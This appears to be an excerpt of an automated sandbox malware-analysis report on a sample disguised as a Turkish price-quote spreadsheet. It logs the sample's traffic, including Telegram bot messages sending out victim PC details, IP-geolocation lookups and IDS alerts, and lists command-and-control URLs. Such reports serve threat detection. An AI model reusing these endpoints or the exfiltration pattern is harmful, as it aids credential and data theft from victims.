                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49744 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49783 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49758 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49796 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49775 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49740 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49812 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49776 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49800 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49798 -> 188.114.96.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49729 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49768 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49788 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:52:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 12:52:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000A.00000002.1419410557.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003198000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003073000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
